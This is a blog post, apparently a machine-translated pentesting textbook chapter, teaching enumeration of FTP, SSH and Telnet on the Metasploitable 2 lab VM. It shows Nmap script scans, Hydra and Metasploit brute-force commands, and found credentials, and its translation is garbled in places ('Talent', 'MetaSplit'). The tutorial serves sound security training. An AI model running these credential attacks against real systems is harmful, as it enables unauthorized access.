Tuesday, February 25, 2025

Advanced Enumeration Phase in Kali Linux – Part 1

 

Advanced Enumeration Phase in Kali Linux – Part 1

In this phase, the goal is to more accurately identify services, protocols, and vulnerabilities in the target systems. This step takes place after the initial identification stage (where only basic information is obtained) and includes more advanced tools and techniques that allow you to extract more detailed and sensitive information.

The Enumeration phase typically consists of the following steps:

  1. Service Scan: In this stage, tools such as Nmap are used to more accurately identify versions and configurations of services. For example, you may be able to identify the exact version of an SSH or Telnet service.
  2. Scripting Scans: Nmap and other tools typically include scripts that allow you to automatically identify certain vulnerabilities. For example, by using Nmap scripts for Telnet or SSH, you can identify vulnerabilities such as lack of encryption support or leakage of credential information.
  3. Brute-Forecing Attacks: Once you have identified possible accounts, you can use tools like Hydra to perform brute-force attacks to test passwords. These attacks can involve using word lists to guess the correct password for each user.
  4. Finding vulnerabilities: At this point, it's important to identify specific vulnerabilities related to incorrect versions of services or configurations. This information can help you exploit these vulnerabilities in the later phases of the attack.

The purpose of this phase:

  • Extracting more accurate information from the target system
  • Identifying weaknesses and vulnerabilities
  • Access to user accounts and passwords
  • Use automated scripts and tools to identify issues faster

This phase typically includes multiple tools, including Nmap, Hydra, and Metasploit to gain more detail and exploit vulnerabilities.

In our discussion, counting means gathering essential information that allows us to exploit a particular service (e.g., FTP, SSH, etc.). For example, the brute-force count of the SSH service allows us to find valid credentials and use it to exploit and log into the remote host. Another common method is to use Nmap scripts to gather essential information such as remote users, versions of services, remote code execution exploits, and more. This chapter doesn't cover all services, but the important part is that you understand the concept of the counting process so that you can apply it to any type of service.

This chapter covers the enumeration of the following services:
■ FTP
■ SSH
■ Telnet
■ SMTP
■ POP3 & IMAP4
■ Microsoft SQL
■ Oracle Database Server
■ MySQL
■ Docker Engine
■ Jenkins
■ HTTP/S
■ RDP
■ VNC
■ SMB
■ SNMP

Transfer Protocols

Already in the comprehensive network scanning tutorial in Kali Linux you have learned how to scan the network and identify the services on each host. At this point, you'll know how to use Nmap to do just that. After scanning each host, we need to start looking for potential vulnerabilities to exploit. For example, you find that your target is a Linux host and uses SSH as a service to allow remote users to authenticate. Do you know what you need to do next? In the following sections, you'll see a logical structure that allows you to check out each popular service.

 FTP (Port 21)

File Transfer Protocol (FTP) is used to transfer files between a client and a remote server. A remote server is used to store files so that you can access them remotely. Sometimes FTP is used by web applications to sync hosted source code (e.g., HTML, JavaScript, etc.). The two secure FTP implementations are FTPS and SFTP. The Secure File Transfer Protocol (SFTP) uses the SSH protocol to transfer files (it uses the same 22 SSH port by default). The Secure File Transfer Protocol (FTPS), on the other hand, uses SSL to encrypt the file transfer, using ports 989 and 990 for this purpose.

These are the common weaknesses of the FTP protocol:
■ Credentials are sent in clear text.
■ File transfers are not encrypted.

FTP Server Exploitation Scenarios

At this point, it's important to understand what the exploitation will be like for the service (you need to know what you're looking for in advance, or you'll just scan with your eyes closed). An FTP server can be exploited in a variety of ways. Here are the common scenarios you'll encounter throughout your career:
■ Brute-force credentials
■ Tapping for clear
text credentials ■ Tapping for unencrypted
files ■ Anonymous access
■ Finding a public exploit associated with the target version of the FTP server (in the next chapter, you'll learn how to search for public exploits)

Counting Workflow – Enumeration Workflow

Throughout this chapter, you'll learn about each service counting workflow through real-life examples (one example is more valuable than a thousand words). In this example, the target is a vulnerable Linux virtual machine called Metasploitable version 2; you can download this version of the host from the Rapid7 link Metasploit Pro.

Service Scan

In the first step, we'll do a simple service scan using Nmap to get an idea of the target FTP server:

root@kali:~# nmap -sV -O -sC -p21 -T5 metasploitable.kcorp.local
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-04 14:33 EDT
Nmap scan report for metasploitable.kcorp.local (172.16.0.101)
Host is up (0.00062s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 172.16.0.102
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
MAC Address: 00:0C:29:D2:1A:B1 (VMware)
Warning: OSScan results may be unreliable because we could not find at
least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Unix
OS and Service detection performed. Please report any incorrect results
at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds

Based on the results of the previous scan, the following have been identified (we will validate this information in the operation phase):

■ We can log in to the FTP server using anonymous credentials.
■ The FTP server version is vsftpd 2.3.4.
■ It has been confirmed that communication is done in the form of clear text.

Advanced Scripting Scan with Nmap – Advanced Scripting Scan with Nmap

Scanning the basic script (-sC) (technically called the default script) doesn't scan everything. At this point, we will enable all the script scanning capabilities in Nmap for the FTP service using the option. Waiting and learning your goal step by step will give you a different perspective and allow you to make better choices. (Penetration testing isn't just about running scanners; it's a methodology.)--script=ftp*

root@kali:~# nmap -sV -O --script=ftp* -p21 -T5 metasploitable.kcorp.local
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-04 14:41 EDT
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
NSE: [ftp-brute] passwords: Time limit 3m00s exceeded.
Nmap scan report for metasploitable.kcorp.local (172.16.0.101)
Host is up (0.00031s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-brute:
| Accounts:
| user:user - Valid credentials
|_ Statistics: Performed 1166 guesses in 181 seconds, average tps: 6.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 172.16.0.102
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
| IDs: BID:48539 CVE:CVE-2011-2523
| vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
| Disclosure date: 2011-07-03
| Exploit results:
| Shell command: id
| Results: uid=0(root) gid=0(root)
| References:
| http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpddownload-backdoored.html
| https://github.com/rapid7/metasploit-framework/blob/master/
modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
|_ https://www.securityfocus.com/bid/48539
[...]

Advanced Script Scan Results:

■ Anonymous login confirmation (which was previously found in the first scan).
■ Brute-Force script was able to find account credentials.
■ The server version was found to be vulnerable and could be exploited.

More techniques for brute-forcing

If you want to do an additional brute-force scan, you can use Hydra to:

root@kali:~# hydra -t 10 -L /opt/SecLists/Usernames/top-usernames-shortlist.txt -P /opt/SecLists/Passwords/xato-net-10-million-passwords-1000.txt ftp://metasploitable.KCorp.local
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-04 20:07:27
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 17000 login tries (l:17/p:1000), ~1700 tries per task
[DATA] attacking ftp://metasploitable.KCorp.local:21/
[STATUS] 190.00 tries/min, 190 tries in 00:01h, 16810 to do in 01:29h, 10 active
[21][ftp] host: metasploitable.KCorp.local login: ftp password: 123456789
[...]

The Hydra command uses the following options: ■: Run 10 parallel
threads ■: File path Usernames
■: File path passwords-t 10-L-P

In the next chapter, we will deal with the operation phase (the information in this chapter is the entry for the operation phase). At this point, we are gathering information on how to operate each service individually.

 SSH (Port 22)

We've learned how the SSH protocol works in previous chapters. If you're not familiar with the difference between public and private keys and how to use them in the SSH protocol

SSH Server Exploitation Scenarios

An SSH server can be exploited in a variety of ways. Here are some common scenarios to look out for:

  1. Brute-force Credentials:
    • In this method, the attacker tries to enter the SSH server using brute-force attacks to guess the username and password. This is usually the main goal in the enumeration phase.
  2. Adding the public key to the authorized_keys file on the server:
    • In this method, the attacker must first access the system (e.g. through a shell) in order to be able to add their public key to the file on the server. This allows the attacker to access the system using their private key from then on.authorized_keys
  3. Using SSH to pivot to other hosts on the network:
    • When a host is attacked and an attacker gains access to its private and public keys, the attacker can use SSH to connect to other hosts on the same network. This process is known as "pivoting" and is usually done in the post-exploitation phase.
  4. Finding a public exploit for the target SSH server version:
    • If a version of the SSH server that is the target of the attack has a known vulnerability, the attacker can use a public exploit to exploit that vulnerability. This can allow an attacker to infiltrate the system.

Read the authorized_keys file of the DSA algorithm (not RSA):

  • If an attacker can read a file that uses the DSA algorithm, they can use the corresponding private key to access the server. This scenario requires shell access or exploitation of vulnerabilities such as "local file inclusion" (LFI) in web applications. Once the private key is found, the attacker can use the following command to log into the server:authorized_keys
 $ssh -i [private key file] [user@ftp_server_ip]

These scenarios are ways that an attacker can exploit the SSH server. The goal is to allow the attacker to infiltrate the system and then gain more access by identifying vulnerabilities.

You can read a detailed article about the recent attack here: https://github.com/g0tmi1k/debian-ssh

Advanced Script Scanning with Nmap

Here's a quick task to extract information from the SSH server on the Metasploitable host:

root@kali:~# nmap -sV -O -sC -p22 -T5 metasploitable.kcorp.local

Scan Result:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 10:55 EDT
Nmap scan report for metasploitable.kcorp.local (172.16.0.101)
Host is up (0.00036s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
MAC Address: 00:0C:29:D2:1A:B1 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
[...]

The only information obtained from the previous scan is the version of the SSH remote server. Next, we need to run a full script scan with Nmap to see if we can find any more issues with the target SSH server:

root@kali:~# nmap -sV -O --script=ssh* -p22 -T5 metasploitable.kcorp.local

Scan Result:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 11:00 EDT
[...]
Nmap scan report for metasploitable.kcorp.local (172.16.0.101)
Host is up (0.00075s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-auth-methods:
|   Supported authentication methods:
|   publickey
|_  password
| ssh-brute:
|   Accounts:
|   user:user - Valid credentials
|_  Statistics: Performed 204 guesses in 181 seconds, average tps: 1.2
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
| ssh-publickey-acceptance:
|_  Accepted Public Keys: No public keys accepted
|_ssh-run: Failed to specify credentials and command to run.
[...]

Previous results show that Nmap has found a valid credential to log in to SSH remotely. Remember that this finding is important because with these credentials we can have remote access to the target server. As we did in the FTP bruforce attack, we can also use Hydra for SSH. We will use the same options that we used for the FTP scenario."

 Brute-Forcing SSH with Hydra

As we did in FTP Brute-Force, we can also use Hydra for SSH. We'll use the same options we used for the FTP scenario:

root@kali:~# hydra -t 10 -L /opt/SecLists/Usernames/top-usernamesshortlist.txt -P /opt/SecLists/Passwords/xato-net-10-millionpasswords-1000.txt ssh://metasploitable.KCorp.local
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or
secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-05
11:11:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it
is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 17000 login tries
(l:17/p:1000), ~1700 tries per task
[DATA] attacking ssh://metasploitable.KCorp.local:22/
[STATUS] 130.00 tries/min, 130 tries in 00:01h, 16870 to do in 02:10h, 10
active
1 of 1 target completed, 0 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-05
14:34:08

Unfortunately, the output of the previous scan found no results. In the next section, "Advanced Brute Force Techniques", you will learn how to execute Brut Force like a hero.

Advanced Brut Force Techniques

Now it's time to use MetaSplit so that we can implement our brute force scanning technique. In the previous example, you saw that we didn't find any user information. In fact, we attempted to perform a force blind attack against our target host. In this example, we'll first use MetaSplash to scan valid usernames on the MetaSplashable host, and then attack those specific users instead of guessing.

To run a metasplit, we enter the command in the terminal window:msfconsole

root@kali:~# msfconsole

After that, the metasplit window will be loaded and we will take the following actions:

  1. We use the username counting module.ssh_enumusers
  2. We identify the IP address of the MetaSplittable host.
  3. We set up the remote SSH port number.
  4. We specify the path of the users' dictionary file.
  5. We set the number of parallel strings to 25.
  6. Finally, we will implement it.

Finally, we'll run it:

msf5 > use auxiliary/scanner/ssh/ssh_enumusers
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 172.16.0.101
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/metasploit/namelist.txt
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set PORT 22
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 25
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run

Scan Output:

[*] 172.16.0.101:22 - SSH - Using malformed packet technique
[*] 172.16.0.101:22 - SSH - Checking for false positives
[*] 172.16.0.101:22 - SSH - Starting scan
[+] 172.16.0.101:22 - SSH - User 'backup' found
[+] 172.16.0.101:22 - SSH - User 'dhcp' found
[+] 172.16.0.101:22 - SSH - User 'ftp' found
[+] 172.16.0.101:22 - SSH - User 'games' found
[+] 172.16.0.101:22 - SSH - User 'irc' found
[+] 172.16.0.101:22 - SSH - User 'mail' found
[+] 172.16.0.101:22 - SSH - User 'mysql' found
[+] 172.16.0.101:22 - SSH - User 'news' found
[+] 172.16.0.101:22 - SSH - User 'proxy' found
[+] 172.16.0.101:22 - SSH - User 'root' found
[+] 172.16.0.101:22 - SSH - User 'service' found
[+] 172.16.0.101:22 - SSH - User 'snmp' found
[+] 172.16.0.101:22 - SSH - User 'syslog' found
[+] 172.16.0.101:22 - SSH - User 'user' found
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_enumusers) >

In the previous output results, a number of usernames were found. Next, we will save all the usernames in the file and save this file to the root home directory. Note that in the example below, we're using a smaller dictionary file for passwords to get results faster. Finally, we use the option for the following reasons:users.txt-e nsr

  • "n" stands for blank password (no password).
  • "s" means login with a password (username=password).
  • "r" means reverse entry (e.g. if it's a username, the password will be reversed).roottoor
root@kali:~# hydra -t 10 -e nsr -L /root/users.txt -P
/opt/SecLists/Passwords/darkweb2017-top100.txt ssh://metasploitable.
KCorp.local
[...]
[22][ssh] host: metasploitable.KCorp.local login: service password:
service
[22][ssh] host: metasploitable.KCorp.local login: user password: user
1 of 1 target successfully completed, 2 valid passwords found

In the next chapter, we will exploit the results we have already found. In addition, we will delve deeper into each SSH exploit scenario.

 Telnet (Port 23)

Talent is an old way of connecting to a remote host using the TCP protocol on port 23 so that you can control the host via the command line (such as SSH). Unlike SSH, Talent communications are not secure and are sent in the form of open text. This protocol was commonly used on older network devices as well as on Windows operating systems. Today, this protocol is rarely active in enterprises, but it still exists, and the server administrator can enable it whenever they want.
Some common vulnerabilities in Talent include:
■ Login information is sent in the form of open text.
■ The text of command-line commands is not encrypted.

Exploitation Scenarios for Telnet Server

A talent server can be exploited in a variety of ways. Here are some common scenarios that you may encounter while performing a penetration test:
■ Bruforce credentials
■ Tapping for login information in plain
text ■ Tapping for non-encrypted command-line commands
■ Finding a generic exploit associated with the target Talent server version

Enumeration Workflow

Here are three tasks we'll perform for this advanced detection workflow:
■ Scanning basic services using Nmap
■ Advanced scanning using Nmap
scripts ■ Bruforcing credentials using Hydra

Service Scan

In the first step, we will perform a basic service scan using Nmap to obtain information about the Talent MetaSplit server:

root@kali:~# nmap -sV -O -sC -p23 -T5 metasploitable.kcorp.local
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-08 13:39 EDT
Nmap scan report for metasploitable.kcorp.local (172.16.0.101)
Host is up (0.00048s latency).
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
MAC Address: 00:0C:29:D2:1A:B1 (VMware)
Warning: OSScan results may be unreliable because we could not find at
least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[...]
Nmap done: 1 IP address (1 host up) scanned in 8.98 seconds

This scan shows port 23 (port telnet) open and identifies the version of the running server (Linux telnetd).

Advanced Scripting Scan

The next step is to look for more vulnerabilities using the full Talent script scan in Nmap:

root@kali:~# nmap -sV -O --script=telnet* -p23 -T5 metasploitable.kcorp.local
[...]
PORT STATE SERVICE VERSION
23/tcp open telnet Linux telnetd
| telnet-brute:
| Accounts:
| user:user - Valid credentials
|_ Statistics: Performed 1227 guesses in 184 seconds, average tps: 6.6
| telnet-encryption:
|_ Telnet server does not support encryption
[...]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[...]
Nmap done: 1 IP address (1 host up) scanned in 185.20 seconds

Based on the previous output results, we come to the following results:
■ We can log in to the Talent server remotely using the username and password.
■ It is also confirmed that communications are not encrypted.useruser

Brut Force with Hydra

To be more sure, we're using Hydra to see if we can find more credentials than Nmap:

root@kali:~# hydra -t 10 -e nsr -L /opt/SecLists/Usernames/top-usernamesshortlist.txt -P /opt/SecLists/Passwords/darkweb2017-top100.txt telnet://metasploitable.KCorp.local
[...]
[23][telnet] host: metasploitable.KCorp.local login: user password: user

Hydra found the same accounts that had previously been identified on Nmap.

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)